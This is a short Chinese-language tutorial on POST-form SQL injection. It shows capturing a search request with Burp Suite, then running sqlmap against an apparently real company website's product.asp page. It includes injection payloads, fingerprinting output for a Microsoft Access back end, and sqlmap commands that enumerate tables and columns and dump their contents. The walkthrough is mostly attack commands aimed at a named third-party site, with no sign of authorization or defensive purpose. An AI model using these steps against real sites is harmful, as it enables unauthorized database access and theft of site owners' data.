post注入框的注入原理 大家可以自己百度一下哦!
要進行post注入我們首先要抓包 。。
用burpsuite或fildder
打開瀏覽器,設置代理,如代理8080端口
好了 隨便輸入一個1字 burpsuite已經抓到包了
key=1&x=23&y=4
然后我們啟動sqlmap 構造一下(直接在命令行輸入) sqlmap -u http://****.cn/product.asp --data "key=1&x=23&y=4"
Place: POST
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1%' AND 1393=1393 AND '%'='&x=24&y=9
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: key=-3532%' UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
---
[23:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[23:58:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.zjyingsong.com'
Place: POST
嗯 post型注入 然后我們就可以猜解了
sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段
sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段
sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "內容,內容," -T 剛才的表段 //猜解內容
